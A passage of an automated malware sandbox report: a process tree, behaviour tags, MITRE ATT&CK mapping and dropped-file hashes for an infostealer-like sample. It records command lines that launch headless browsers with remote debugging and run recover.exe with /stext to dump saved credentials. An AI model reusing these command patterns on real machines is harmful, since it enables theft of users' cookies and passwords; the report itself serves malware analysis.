C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4900,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4896 /prefetch:16⤵
- Uses browser remote debugging
PID:4676
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4868,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5284 /prefetch:16⤵
- Uses browser remote debugging
PID:3576
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5044,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3284 /prefetch:16⤵
- Uses browser remote debugging
PID:3608
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5128,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5488 /prefetch:16⤵
- Uses browser remote debugging
PID:1404
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4876,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4944 /prefetch:16⤵
- Uses browser remote debugging
PID:4696
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=3364,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3288 /prefetch:86⤵PID:3932
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3204,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3200 /prefetch:16⤵
- Uses browser remote debugging
PID:1764
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=5204,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3328 /prefetch:86⤵PID:2256
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=4980,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5520 /prefetch:16⤵
- Uses browser remote debugging
PID:1412
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=3348,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5148 /prefetch:86⤵PID:620
-
-
C:\Program Files\Google\Chrome\Application\Chrome.exe"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=5656,i,5016148264001796789,16618070915763636337,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5652 /prefetch:86⤵PID:3608
-
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\mmxcqdbeypzvjdfogqjen"5⤵PID:1420
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\mmxcqdbeypzvjdfogqjen"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2376
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\xgkvrnmxuxratjbsxbvfqtdw"5⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4872
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\hipnrgxzifjfwypeglizbgyfveil"5⤵PID:2384
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\hipnrgxzifjfwypeglizbgyfveil"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3704 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ffec1adf208,0x7ffec1adf214,0x7ffec1adf2206⤵PID:2484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1944,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1936 /prefetch:26⤵PID:2672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=2256,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2076 /prefetch:36⤵PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=2656,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2652 /prefetch:86⤵PID:4004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --instant-process --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3548,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:16⤵
- Uses browser remote debugging
PID:4116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4356,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4352 /prefetch:16⤵
- Uses browser remote debugging
PID:2704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --extension-process --renderer-sub-type=extension --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4372,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4360 /prefetch:26⤵
- Uses browser remote debugging
PID:772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --extension-process --renderer-sub-type=extension --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4376,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:26⤵
- Uses browser remote debugging
PID:2708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=4664,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4660 /prefetch:16⤵
- Uses browser remote debugging
PID:2080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5160,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:86⤵PID:3540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=4388,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:86⤵PID:4036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=4568,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4860 /prefetch:86⤵PID:3504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5400,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:86⤵PID:3652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5844,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5784 /prefetch:86⤵PID:2240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5844,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5784 /prefetch:86⤵PID:4572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=6160,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6156 /prefetch:86⤵PID:3540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=6268,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6184 /prefetch:86⤵PID:2680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=6324,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6332 /prefetch:86⤵PID:372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=6412,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6408 /prefetch:86⤵PID:2320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=6264,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6260 /prefetch:86⤵PID:2568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=6308,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:86⤵PID:3012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=6528,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6156 /prefetch:86⤵PID:5296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=6924,i,4058142526947583001,314569372494343127,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6932 /prefetch:86⤵PID:5644
-
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c exit /b 02⤵PID:4012
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1444
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Windows\System32\ieframe.dll",OpenURL C:\\ProgramData\\Dguhdowe.url1⤵
- Checks computer location settings
PID:3576 -
C:\Users\Admin\Links\Dguhdowe.PIF"C:\Users\Admin\Links\Dguhdowe.PIF"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2620 -
C:\Windows\SysWOW64\SndVol.exeC:\Windows\System32\SndVol.exe3⤵
- System Location Discovery: System Language Discovery
PID:5852
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3648
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Windows\System32\ieframe.dll",OpenURL C:\\ProgramData\\Dguhdowe.url1⤵
- Checks computer location settings
PID:6024 -
C:\Users\Admin\Links\Dguhdowe.PIF"C:\Users\Admin\Links\Dguhdowe.PIF"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6056
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59a020804eba1ffac2928d7c795144bbf
SHA161fdc4135afdc99e106912aeafeac9c8a967becc
SHA256a86c6c7a2bf9e12c45275a5e7ebebd5e6d2ba302fe0a12600b7c9fdf283d9e63
SHA51242f6d754f1bdbeb6e4cc7aeb57ff4c4d126944f950d260a0839911e576ad16002c16122f81c1d39fa529432dca0a48c9acfbb18804ca9044425c8e424a5518be
-
Filesize
83B
MD5fbaff95b58912413fc63887331398a9b
SHA14186ec7b42c413d2d5fab94c7977dffc839f42f0
SHA256fda5327b72df18bea70f6ab37077e6a846273c0622328861efcd54a55a6f3175
SHA512113bc5ff97bbdee2cc1e02a330bff8ff1db0e647560374a753b13ad5a90684e1c7c00e9725fc66bb38b147e5db70592aa22992af51f38cbbe37c218d39c25698
-
Filesize
19KB
MD51df650cca01129127d30063634ab5c03
SHA1bc7172dec0b12b05f2247bd5e17751eb33474d4e
SHA256edd4094e7a82a6ff8be65d6b075e9513bd15a6b74f8032b5c10ce18f7191fa60
SHA5120bddf9ecaaedb0c30103a1fbfb644d6d4f7608bd596403307ed89b2390568c3a29e2cf55d10e2eadbfc407ede52eaf9a4f2321ba5f37e358a1039f73c7688fbd
-
Filesize
99B
MD53988f3918338e0f82a776f6ca95d07c5
SHA1528a23dc0a17b76f4b192b7ceace1b5be1e9a21a
SHA2560119f8027f31371ed977a37a43b971ee80553757386cc25c1d824304dbbe6399
SHA512a0898b2e529d1f1674c87627f68a64ff8e77595b3f260aa5c0a0546eb316900b6968c59102551005d18d3e327d0ad35d367a0cca89eaf4764c5bcad453367bf1
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD574114843c97cf974534cade84274fff6
SHA1f04c6e0ff965c5de68f4a30c280bd2d493536110
SHA25684f66cb6544802124beef7a94643cedbe89fdcdba6971fe18f5e026bcafec009
SHA512a8dc5fe2724ea42467a26fc9177e5bd0cbf53483346138509c44b27ebfc641c7ee397578f37b1ce9f9fe363d2c9aaa26c660d65b03aa1897082e01337d03ad65
-
Filesize
152KB
MD5dd9bf8448d3ddcfd067967f01e8bf6d7
SHA1d7829475b2bd6a3baa8fabfaf39af57c6439b35e
SHA256fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
SHA51265347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de
-
Filesize
10KB
MD578e47dda17341bed7be45dccfd89ac87
SHA11afde30e46997452d11e4a2adbbf35cce7a1404f
SHA25667d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550
SHA5129574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5
-
Filesize
1024KB
MD5b0366599d64b0fc1adb2a712dcd02ee1
SHA1b7a1c09ccd2846664cab5f76bd80b8e9f107acb0
SHA256ae1bddb9e2cc97b0c9cd78ef3cd17553be6e5204677bd67e0b8f7fa27007f189
SHA512d7de6d48285018f8b709c81ca01688126db7893ce9f48829524ee3122aa6f2200c7f78186b5a558d0b1ecf8157ee78a20064b63b45ab89f7aa0835b8409435d0
-
Filesize
40B
MD5d124464dbd0b42e6e89f1068cf499603
SHA1f83704b53d1925c8be35401bec25a4ad17cd0386
SHA256259a3cf8c79d7d36f6dd98ea328c45d0c947785200a5bf31453537e552be5f58
SHA512ff8576f5cadb5d4c009fb99e1cabb180b8e9742733d35983c97ef1277b4dbfe4325954279ec092b33426cf793bb72a853c3cabe4e2cfc7d037cd661c1ed66042
-
Filesize
280B
MD54fb7f515a15160cf100673305b935d75
SHA1b2b22e80880ecb24b2b2918d0f8c18c7d2a0707f
SHA25661cacf8ef440999cbdd395e5fb7e8b837af1a1490ffcea1679095b6450809c7f
SHA512ef2c3f26498139b8bc5fa821dc84e91d2868ecc428b4705e494271b196a3dcb433ed4e25b1761ae535da53ed32bfab5037908f95bdd5b9b3c2788f61547f4b6c
-
Filesize
280B
MD5b6363b0a19e9d05e7dd173d05758bc47
SHA175c1f11179405a39801e556a60636aa6e72ed844
SHA25669eccd201dd33228af56b0f5c9ad718c0b4ccb1d287f82929e48fb62f33c007e
SHA512f64e2466b6c0f2e0e878dcba0e135faf370d0b7464e1db9898c2f8cf778d32e5a08cd71f2c77e145c9215bdaf1d9d8ad99f76d4a702d84a9c15428a61db2200c
-
Filesize
280B
MD50828b271410875d0b69d47e348781e9c
SHA1caa5a1d49338a5f636938ef85b169b1c26bb7783
SHA256b155502c3ce18b0ac6224247ede6a76a7544068c979002e822fca988e54082f0
SHA5127e98a0af3ce1ca495d8f52356e619de62bb2fbe71b6a82e0dc681ddd74f5b6a4dbce3931ccd5e860221414fb2fb786005c4b622c509d79c01119d903949d2483
-
Filesize
20B
MD59e4e94633b73f4a7680240a0ffd6cd2c
SHA1e68e02453ce22736169a56fdb59043d33668368f
SHA25641c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337
-
Filesize
72B
MD54146b6617039f1cf8fcdf9836a519287
SHA1fb34ac02a8d7f95d8f97ce1edd9c5915d7b0964f
SHA256f15dbf384a0864d2185868613ee561992581a6da26e6ac95282f82ece0e4162c
SHA5126324bc4965dc34c5df06a1dc91a483811b835f250dcdb1c9f1db25ce13852dec9a4a310bdc345146313ffa5111c787ae2632ff90dd9b755da4aa68f4603f31df
-
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.90.1_0\dasherSettingSchema.json
Filesize854B
MD54ec1df2da46182103d2ffc3b92d20ca5
SHA1fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA2566c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js
Filesize9KB
MD53d20584f7f6c8eac79e17cca4207fb79
SHA13c16dcc27ae52431c8cdd92fbaab0341524d3092
SHA2560d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643
SHA512315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59
-
Filesize
8KB
MD5cf89d16bb9107c631daabf0c0ee58efb
SHA13ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA5128cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0
-
Filesize
264KB
MD5d0d388f3865d0523e451d6ba0be34cc4
SHA18571c6a52aacc2747c048e3419e5657b74612995
SHA256902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17
-
Filesize
8KB
MD50962291d6d367570bee5454721c17e11
SHA159d10a893ef321a706a9255176761366115bedcb
SHA256ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed
-
Filesize
8KB
MD541876349cb12d6db992f1309f22df3f0
SHA15cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e
-
Filesize
